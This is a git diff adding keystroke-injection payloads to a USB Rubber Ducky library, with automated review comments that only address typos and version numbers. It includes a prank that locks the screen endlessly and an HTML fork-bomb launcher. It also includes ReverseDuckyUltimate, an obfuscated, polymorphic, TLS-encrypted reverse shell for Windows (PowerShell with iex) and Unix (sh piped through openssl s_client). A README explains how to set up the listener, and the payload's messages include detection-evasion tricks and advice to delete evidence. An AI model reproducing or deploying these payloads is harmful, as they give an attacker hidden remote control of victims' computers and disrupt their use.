--- /dev/null
+++ b/payloads/library/prank/EternalLock
@@ -0,0 +1,54 @@
+REM EternalLock
+REM Version 1.0
+REM OS: Windows / Unix
+REM Author: 0iphor13
+REM Requirement: DuckyScript 3.0
+REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out)
+
+ATTACKMODE HID STORAGE
+
+REM Extension DETECT_READY by Korben for best and fastest deployment
+EXTENSION DETECT_READY
+ REM VERSION 1.0
+
+ REM USAGE:
+ REM Extension runs inline (here)
+ REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ REM boot delay
+
+ REM TARGETS:
+ REM Any system that reflects CAPSLOCK will detect minimum required delay
+ REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+
+ REM CONFIGURATION:
+ DEFINE RESPONSE_DELAY 25
+ DEFINE ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
+REM Delay until the machine gets locked
+DEFINE #TRIPWIRETIME 3000
+REM Time between forced machine locks
+DEFINE #LOCKTIME 100
+
+WAIT_FOR_STORAGE_ACTIVITY
+DELAY #TRIPWIRETIME
+
+BUTTON_DEF
+ WHILE TRUE
+ ATTACKMODE STORAGE
+ END_WHILE
+END_BUTTON
+
+REM Lock machine until Button is pressed
+WHILE TRUE
+GUI l
+DELAY #LOCKTIME
+END_WHILE
diff --git a/payloads/library/prank/HTML_Fork-Bomb/payload-ie.txt b/payloads/library/prank/HTML_Fork-Bomb/payload-ie.txt
new file mode 100644
index 0000000..0b0630b
--- /dev/null
+++ b/payloads/library/prank/HTML_Fork-Bomb/payload-ie.txt
@@ -0,0 +1,14 @@
+REM HTML Fork Bomb by Jonny Banana
+REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb
+DELAY 2000
+CONTROL ESCAPE
+DELAY 200
+STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/
+DELAY 200
+ENTER
+REM set a long delay to give time to this disgusting browser
+DELAY 1000
+REM it's time to enable Pop-Up
+TAB
+DELAY 200
+ENTER
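Review bot: The EternalLock header states `REM OS: Windows / Unix`, but the lock loop sends `GUI l`, which is the Windows lock chord; whether a Unix desktop locks on that key depends on the environment, so the comment should record what was actually tested, e.g. `REM OS: Windows (GUI l); other desktops only where Super+L locks the session`. The description comment has a typo, `ther ducky` → `the Ducky`. The `BUTTON_DEF` body re-issues `ATTACKMODE STORAGE` in a `WHILE TRUE` loop with no comment on why a loop rather than a single call is needed; one line stating the intent would help the next reader.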
diff --git a/payloads/library/prank/HTML_Fork-Bomb/payload.txt b/payloads/library/prank/HTML_Fork-Bomb/payload.txt index 0b0630b..7aed289 100644 --- a/payloads/library/prank/HTML_Fork-Bomb/payload.txt +++ b/payloads/library/prank/HTML_Fork-Bomb/payload.txt @@ -3,11 +3,11 @@ REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb DELAY 2000 CONTROL ESCAPE DELAY 200 -STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/ +STRING C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/ DELAY 200 ENTER REM set a long delay to give time to this disgusting browser -DELAY 1000 +DELAY 2000 REM it's time to enable Pop-Up TAB DELAY 200 diff --git a/payloads/library/prank/silent_rickroll/README.md b/payloads/library/prank/silent_rickroll/README.md index f893b83..1c07aa1 100644 --- a/payloads/library/prank/silent_rickroll/README.md +++ b/payloads/library/prank/silent_rickroll/README.md @@ -8,7 +8,7 @@ This script does the following actions respectively + Runs Batch file *** -##Description +## Description The script was thought in a way that the payload could be executed in machines that have some level of protection and wont allow the user to open Run Dialog or CMD straight away Setting the volume to maximum is used with keystroke injection. diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/README.md b/payloads/library/remote_access/ReverseDuckyUltimate/README.md new file mode 100644 index 0000000..21cab52 --- /dev/null +++ b/payloads/library/remote_access/ReverseDuckyUltimate/README.md @@ -0,0 +1,56 @@ +# Title: ReverseDuckyUltimate + +

Author: 0iphor13
+OS: Windows
+Version: 1.0
+Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum

+ +**What is ReverseDuckyUlitmate?** +# +*ReverseDuckyUltimate (RDU) takes the best of every ReverseDucky payload. Customization, encryption, indentifiers, multi-layer polymorphism and automatic setup!* +*RDU is the ulitmate experience when it comes to remote access via your Rubber Ducky and it's so easy to use!* +# +## Instruction + +Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup). +- First: Create key.pem & cert.pem like so:
+``` +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes +``` +It will ask for information about the certificate - Insert whatever you want.
+ +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png) + +- Second: Start a listener on your attacking machine which supports certificates. + Examples: +``` +openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number] +ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem +``` +- Third: Define the IP-Address and Port of your listening machine within the payload. Additionally add an unique identifier to give your Duck a name. + +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png) + +- Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go. + +## Instruction - Automatic Setup +- First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use. + +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png) + +- Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky. + +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png) + +- Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go! 
+ +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png) +# + +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png) + +Credit for DS 3.0 implentation and ideas: +- Daniel Bohannon +- Grzegorz Tworek +- Korben +- Nikhil Mittal diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png new file mode 100644 index 0000000..d185905 Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png differ diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png new file mode 100644 index 0000000..61d6042 Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png differ diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png new file mode 100644 index 0000000..c1a7c60 Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png differ diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png new file mode 100644 index 0000000..1538c96 Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png differ diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png new file mode 100644 index 0000000..dd80a63 Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png differ 
diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png new file mode 100644 index 0000000..b28725b Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png differ diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt new file mode 100644 index 0000000..155de38 --- /dev/null +++ b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt 
@@ -0,0 +1,357 @@ +REM ReverseDuckyUltimate +REM Version 1.1 +REM OS: Windows / Unix +REM Author: 0iphor13 +REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum +REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed. + +REM Extension PASSIVE_WINDOWS_DETECT by Korben for best and fastest deployment with guard rails +EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + +REM Extension Rolling_Powershell_Execution by 0iphor13 to obfuscate the start of Powershell +EXTENSION Rolling_Powershell_Execution + REM VERSION 1.0 + REM Author: 0iphor13 + REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek + REM Requirements: PayloadStudio v.1.3 minimum + REM Starts Powershell in uncommon ways to avoid basic detection + REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection. 
+ + REM CONFIGURATION: + REM Add ExecutionPolicy bypass + DEFINE #EXECUTIONPOLICY FALSE + DEFINE #DELAY 200 + + $_RANDOM_MIN = 1 + $_RANDOM_MAX = 16 + VAR $RANDOM_PS = $_RANDOM_INT + FUNCTION Rolling_Powershell_Execution() + IF ($RANDOM_PS == 1) THEN + STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid" + ELSE IF ($RANDOM_PS == 2) THEN + STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi" + ELSE IF ($RANDOM_PS == 3) THEN + STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi" + ELSE IF ($RANDOM_PS == 4) THEN + STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H" + ELSE IF ($RANDOM_PS == 5) THEN + STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi" + ELSE IF ($RANDOM_PS == 6) THEN + STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD" + ELSE IF ($RANDOM_PS == 7) THEN + STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi" + ELSE IF ($RANDOM_PS == 8) THEN + STRING powershell -NoPro -noninT -win h + ELSE IF ($RANDOM_PS == 9) THEN + STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD" + ELSE IF ($RANDOM_PS == 2) THEN + STRING powershell.exe -NoP -nOni -W h + ELSE IF ($RANDOM_PS == 10) THEN + STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H" + ELSE IF ($RANDOM_PS == 11) THEN + STRING powershell -nopr -noninT -W HiddEn + ELSE IF ($RANDOM_PS == 12) THEN + STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi" + ELSE IF ($RANDOM_PS == 13) THEN + STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h" + ELSE IF ($RANDOM_PS == 14) THEN + STRING powershell -noproF -noni -W Hi + ELSE IF ($RANDOM_PS == 15) THEN + STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi" + ELSE ($RANDOM_PS == 16) THEN + STRING powershell.exe -noP -nOnI -windo H + END_IF + + 
IF_DEFINED_TRUE #EXECUTIONPOLICY + SPACE + IF (($RANDOM_PS % 2) == 0) THEN + STRING -ep ByPasS + ELSE IF (($RANDOM_PS % 5) == 0) THEN + STRING -exec bypass + ELSE IF (($RANDOM_PS % 7) == 0) THEN + STRING -exeC byPasS + ELSE IF (($RANDOM_PS % 10) == 0) THEN + STRING -exEcUtionPoL bYpaSs + ELSE IF (($RANDOM_PS % 12) == 0) THEN + STRING -exEcUtion bYPaSs + ELSE + STRING -eP BYPaSs + END_IF + END_IF_DEFINED + ENTER + DELAY #DELAY + END_FUNCTION + REM EXAMPLE USAGE AFTER EXTENSION + REM DELAY 2000 + REM GUI r + REM DELAY 2000 + REM Rolling_Powershell_Execution() +END_EXTENSION + +REM Define the attackers IP, Port and Identifier +DEFINE #ADDRESS '0.0.0.0' +DEFINE #PORT 4444 +DEFINE #IDENTIFIER Ducky +REM Automatic setup requires openssl! +DEFINE #SETUP FALSE + +REM Automatic setup and start listener - Requires openssl! +IF_DEFINED #SETUP + IF ($_OS == #NOT_WINDOWS) THEN + DELAY 1500 + STRINGLN echo "Setting up Infrastructre - Do not interact!" + DELAY 1000 + STRINGLN openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && echo "Setup complete! Starting listener on Port #PORT " && openssl s_server -quiet -key key.pem -cert cert.pem -port #PORT + ELSE + DELAY 1500 + GUI r + DELAY 1000 + STRINGLN notepad.exe + DELAY 250 + STRING Setup requires an unix based machine with openssl installed! 
+ END_IF +ELSE_DEFINED + IF ($_OS == WINDOWS) THEN + + REM Pseudo random variables for layer one polymorphism + VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE + VAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE + VAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE + VAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE + VAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE + VAR $var_gIbberish5 = $_RANDOM_UPPER_LETTER_KEYCODE + VAR $var_gibberish6 = $_RANDOM_NUMBER_KEYCODE + VAR $var_gibBerish1 = $_RANDOM_NUMBER_KEYCODE + + REM Layer two polymorphism + VAR $RANDOM_LAYER = $_RANDOM_INT + + REM Polymorphism function + FUNCTION Polymorphism() + IF (($RANDOM_LAYER % 2) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gIbberish5 + ELSE IF (($RANDOM_LAYER % 6) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + ELSE + STRING $ + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish4 + END_IF + END_FUNCTION + + REM Polymorphism function + FUNCTION Polymorphism2() + IF (($RANDOM_LAYER % 6) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gIbberish5 + INJECT_VAR $var_gIbberish5 + ELSE IF (($RANDOM_LAYER % 9) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gIbberish5 + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + ELSE + STRING $ + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish3 + INJECT_VAR 
$var_gibberish6 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gIbberish5 + END_IF + END_FUNCTION + + REM Polymorphism function + FUNCTION Polymorphism3() + IF (($RANDOM_LAYER % 1) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gIbberish5 + ELSE IF (($RANDOM_LAYER % 8) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gIbberish5 + INJECT_VAR $var_gibberish + ELSE + STRING $ + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gIbberish5 + END_IF + END_FUNCTION + + REM Polymorphism function + FUNCTION Polymorphism4() + IF (($RANDOM_LAYER % 1) == 0) THEN + STRING $ + INJECT_VAR $var_gIbberish5 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibb3rish + ELSE IF (($RANDOM_LAYER % 8) == 0) THEN + STRING $ + INJECT_VAR $var_gibBerish1 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gIbberish5 + INJECT_VAR $var_gibberish + ELSE + STRING $ + INJECT_VAR $var_gibberish6 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gIbberish5 + END_IF + END_FUNCTION + + REM Connection Message + FUNCTION Quack_Slogan() + IF (($RANDOM_LAYER % 2) == 0) THEN + STRING "[!] Quack you $env:USERNAME/$env:COMPUTERNAME! `n[?] Opsec Tip: Use environment variables.`n`n" + ELSE IF (($RANDOM_LAYER % 3) == 0) THEN + STRING "[!] $env:USERNAME/$env:COMPUTERNAME got found a flash drive... `n[?] Considere converting IPs to decimal (e.g. 127.0.0.1 = 2130706433)`n`n" + ELSE IF (($RANDOM_LAYER % 4) == 0) THEN + STRING "[!] $env:USERNAME/$env:COMPUTERNAME compromised by #IDENTIFIER `n[+] Ducks > D0lphins!`n`n" + ELSE IF (($RANDOM_LAYER % 6) == 0) THEN + STRING "[!] Quack Attack on $env:USERNAME/$env:COMPUTERNAME `n[+] Sometimes it is better to wait...Be patient!`n`n" + ELSE IF (($RANDOM_LAYER % 8) == 0) THEN + STRING "[!] Established remote access on $env:USERNAME/$env:COMPUTERNAME `n[?] 
Watch out for powershell -v 2!`n`n" + ELSE IF (($RANDOM_LAYER % 9) == 0) THEN + STRING "[!] $env:USERNAME/$env:COMPUTERNAME messed with the Duck `n[?] Remember to delete evidence.`n`n" + ELSE + STRING "[!] $env:USERNAME/$env:COMPUTERNAME says Quack! `n[+]...and then he waddled away...`n`n" + END_IF + END_FUNCTION + + GUI r + DELAY 500 + Rolling_Powershell_Execution() + DELAY 300 + Polymorphism() + STRING =[Text.Encoding]::UTF8.GetBytes( + Quack_Slogan() + STRING ); + Polymorphism2() + REM Section were Address & Port get reflected + STRING =New-Object Net.Sockets.TcpClient( #ADDRESS , #PORT ); + STRING $s= + Polymorphism2() + STRING .GetStream(); + STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])); + STRING $sSL.AuthenticateAsClient('madeby.0iphor13', $null, "Tls12", $false); + Polymorphism3() + STRING =new-object System.IO.StreamWriter($sSL); + STRING $sSL.write( + Polymorphism() + STRING ,0, + Polymorphism() + STRING .Length); + Polymorphism3() + STRING .Write(' + REM Identifier + STRING #IDENTIFIER + STRING @PS '+(&('g'+'l'))+'> '); + Polymorphism3() + STRING .flush();[byte[]] + Polymorphism4() + STRING = 0..65535|%{0};while(($i=$sSL.Read( + Polymorphism4() + STRING , 0, + Polymorphism4() + STRING .Length)) -ne 0){$D=(New-Object -TypeName System.Text.ASCIIEncoding).GetString( + Polymorphism4() + STRING ,0, $i); + STRING $Y=(iex $D | Out-String ) 2>&1;$X=$Y + ' + REM Identifier + STRING #IDENTIFIER + STRING @PS ' + (Get-LoCatIon).Path + '> '; + STRING $Z=([text.encoding]::UTF8).GetBytes($X);$sSL.Write($Z,0,$Z.Length); + STRING $sSL.Flush()};exit + DELAY 250 + ENTER + REM Indicator of successful execution + CAPSLOCK + DELAY 20 + CAPSLOCK + ELSE + REM Executing reverse shell when inserted into non-windows box + REM Non-ideal solution for opening terminal (But should work for most unix distros) + DELAY 2000 + INJECT_MOD COMMAND + DELAY 2000 + STRING terminal + DELAY 500 + ENTER + DELAY 
1000 + STRINGLN which screen >/dev/null && which openssl >/dev/null && screen -md sh -c 'mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect #ADDRESS:#PORT > /tmp/s; rm /tmp/s' + DELAY 1000 + STRINGLN exit + END_IF +END_IF_DEFINED
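Review bot: The payload header says `REM Version 1.1` while the README added in the same commit states `Version: 1.0`; the two should agree. The first extension line reads `EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT`, with the keyword doubled (unless this is a rendering artifact), unlike `EXTENSION Rolling_Powershell_Execution` further down. Comment typos: `REM Section were Address & Port get reflected` → `where`, and the user-facing `STRINGLN echo "Setting up Infrastructre ..."` misspells Infrastructure. The hunk appears to end at `END_IF_DEFINED`, which closes the top-level `IF_DEFINED #SETUP`; if the file continues beyond this chunk the header points still apply.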